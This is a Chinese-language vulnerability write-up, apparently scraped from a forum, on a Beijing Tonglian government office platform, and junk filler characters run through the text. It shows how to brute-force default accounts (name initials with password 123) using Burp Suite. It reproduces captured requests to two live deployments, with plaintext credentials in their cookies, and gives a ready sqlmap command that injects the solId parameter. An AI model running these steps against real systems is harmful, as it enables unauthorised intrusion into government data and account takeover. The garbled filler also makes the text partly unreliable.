|
4 v; G) J9 u$ v. `7 y) V. U; I h G9 K0 P( Y% \+ y
8 U" l$ k& Q6 D1 R/ n' Y; T6 ?2 q" x2 u( D4 Z( {. g
平台简介: }( \9 O# V, X4 I _# L" w2 z, n
9 @; H/ V/ ~* l9 ]7 r
" q8 n3 n: O# S' I* w, |! U
6 ^8 q$ o& ]- m' b( C
( ~2 ^3 r' ?) D F3 }5 M
8 y) _# e4 n* I6 H# K. F 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 ( @) X5 w4 b1 d
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。 F3 ~8 I8 S8 l# `) U# x' Z
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!, g! S4 b# ]8 f2 ~' _
8 W% E" n+ i7 s, T& W, J6 C; h+ r2 b
, O2 m x9 y$ o' @& V* f/ u5 D
/ ^) n1 q0 A; t) v5 Q; ^1 I0 I7 Y' U! y; _* n+ U
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:3 _' S+ S- d4 ^& ^3 r
; ^8 X& X* @' e! K) N2 E" @3 k# v% V3 s H* {: Y; X% L/ L8 ?
: X& ~+ U# H) w0 c
; M' v- f V$ H* D7 l1 H: S' _5 h) j: N9 i1 A. @# ~$ z- V8 x6 v
http://1.1.1.1:7197/cap-aco/#(案例2-)
+ d# g9 Z3 R: Y/ H# i
: s0 F7 r$ B5 c9 Q, e2 O6 c; B. s8 a8 t7 |5 K/ f
http://www.XXOO.com (案例1-官网网站)
# {( y( l1 _; B* k5 ]
/ y8 b5 I/ t! y' F7 \
) D% k# |" S5 B1 H, k5 z
% o. H) h- _" e9 V3 z 7 Y; a6 Z8 i/ Z. P
; t5 h0 f6 d2 I) s+ `. P
漏洞详情:* D4 |4 d# a. r- E5 V3 Q
; f7 O( l( W# R6 l, h
% Q! D2 ?) Z O- V; y
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
3 W8 f/ o7 M" { V/ R/ P
9 ]' t5 y# Z$ q8 _9 e- b7 D( S/ _! v6 s+ U& w* j' w9 \
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
" T* e% [* K' I4 o2 P+ q m( t 6 _/ S, E2 X! V+ T- @! L% }5 d8 x7 g
- a/ P# E _6 |! \3 X- w3 U - X5 ]7 \' ^" ?4 e- p3 Q
, o" @0 i9 ? ?- ] ~
3 k: v) K5 u- X1 Q% i) r
$ O5 t4 v! S& P0 S
, m2 g: w; l: m5 U% @, Q4 V$ O6 Q& {* D& z/ S
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:$ D b4 Z! V% ~; T$ I9 T. {, [
$ l" Q; ^* s9 W7 G* i1 {$ k, ^- k5 ~/ w6 K4 H) G) |- ~" n
1、案例1-官方网站
/ U, C& B* Q* {1 S V
1 y. D3 e( H. ^8 o O) ?
7 W7 |- d" H2 w' M! r0 B+ q GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
/ `7 L4 J" w8 a+ Q8 o+ Q
* t I' N+ I* t8 L& O6 ]) @! ]; s2 y9 D
Host: www.XXOO.com
: w' P( Y: d1 R" A9 }& X) i6 X0 p
4 s% W1 E- ?! \" A" a2 X6 R$ H1 M: @; S. y- u7 h+ Y' r/ V0 h
Proxy-Connection: Keep-Alive
" i* l' ?4 z+ m
/ X- [. M# r. J0 j3 {& \+ g R" `
Accept: application/json, text/javascript, */*; q=0.01
* }# d3 |7 O1 _% b" W) V# b + m. m$ t& h5 n n. s k" `* ~( w
1 M; k2 v* P; D0 Z: B& [' Z
Accept-Language: zh-CN
6 b' U2 w' z/ @, o , B7 g2 \$ N4 G) e( ~- t4 a2 o3 L
1 W1 x2 ~, c& X! A Content-Type: application/json
) w" j" o3 \5 @5 I6 l ! m$ P+ p3 _( d8 y
p' l& c3 C. Y, Y' }- A N9 c User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
- @& p5 a8 M# {; A5 \, i' | 6 u& Z K H+ V3 W) n& `- z2 n9 d
4 ?8 O5 h* a% q% ~* F8 M
X-Requested-With: XMLHttpRequest
+ F" M) |% V+ j$ J( K
6 f" h. ~7 {% V* v& n4 h
/ w2 J& F* Z0 @: g7 T4 B Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
, h- T+ a9 l. U3 n7 A
$ v3 m+ Y' q. p: j
. T; K- M# K1 \2 x c Accept-Encoding: gzip, deflate, sdch7 _, E- V2 b& M/ i) I7 x
, [7 y+ g( t9 W5 p1 H x! W! Q7 X1 h" ? s# C9 R- f
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
& L" ~. G; j% y& F% R- } % C0 |! [8 v& K: v# v( Y8 m
. D8 |) L8 E' C, i' i
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
& R+ d- @% J# X# _7 f- f
- K6 [- Q# _0 V0 z9 J, q6 ~1 y6 }, a( L( K
# W3 p' Y8 ?! L% b! k" o" M" R7 T$ s! S
2 Q( W1 t- E4 ^! v5 Z
O; Q& r7 W7 |% N! F2 B+ M* U0 d
" R/ j4 `1 O9 S3 q6 [0 B' l2 S / u4 Y$ s1 u; ]' l3 ^% c8 H
R3 ?. f- c' G; x( E/ ]/ N# T
9 `( B' r+ L5 h- w' P+ A
$ W1 e, z/ G+ K
2 x5 ]* F: d' c/ a2 c . _5 t1 W3 f" k1 I! [5 E2 d9 ]1 j% ?- [
$ j# N2 V! j1 q+ t1 `/ z
& n/ B' ^2 j H3 b
( i% N) O- o6 x, V9 b
9 a: C' @% g) f) B
' |. R; a' S6 k 2、案例2-某天河云平台" N. Y6 E. F6 \2 o# M8 P% c: I
; x/ Q; c3 l; c4 w6 v% J X
) h( E. y* A" p H GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
! c/ e Y8 R3 I" m% C9 |
3 `2 _- A5 {' }3 ]$ K
% g1 Y# U4 G1 i% `+ `+ @ Host: 1.1.1.:7197- O8 c. D w& z
) U5 q: C( I. {# a; Q; m7 o2 ?; ?+ }8 p, n3 k$ j' S7 P" P/ Z& {. M: W% F
Accept: application/json, text/javascript, */*; q=0.01
( Q; j6 }% B8 A+ Z+ {# y $ m9 `4 j1 ? R4 b" a( O: Z
. W8 ^& ~: L+ t, q) Y8 F X-Requested-With: XMLHttpRequest
- x" F, M$ F5 v. B
* A0 E7 S8 ?: S0 b4 J2 }' N
# `( g/ H, F- c+ F/ M y User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
5 w4 p6 i+ T/ S9 s9 x8 R% F
; `0 J! u; Q6 _6 v' n0 x3 x+ K2 A0 q" W8 S
Content-Type: application/json, \7 w# a/ h1 {0 l4 s
' }" h) q# h& U4 l8 ~, y, F: @( l& D& Q6 C1 l. ?. e- s& \
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
3 t4 I4 ]8 B3 z8 W# |/ u3 S 8 x7 e+ s" p) P0 Q
' A+ i# H# A! U3 k Accept-Language: zh-CN,zh;q=0.83 p: u& X+ G% O8 F2 G! U- n5 s0 S- C
9 b; d& n! R) P* D; w/ _. H! l
* H7 |, J- J6 E1 ~5 A0 z3 @ Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
9 [7 Y8 \- d$ v `4 a, \! \) c
7 {8 {- v. w6 c, Q$ A
, i+ S. V9 `3 J5 }2 u! C; B) T" o! O Connection: close0 d7 a/ G2 ^8 E9 y
: h" a4 m6 W3 }+ R7 a" X2 [
5 z4 v7 ]9 f2 h/ C% h
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
8 \( j$ B8 ]3 u2 b
/ f$ u, _! N' W( X" F: I
. {5 Q `; x" `3 M4 k% E% @ 1 A, D# I& e: k! N! l
: y. x: t! _5 h2 C, n) \& l
p* w. g, K: h 9 T8 }/ m: Z9 }
|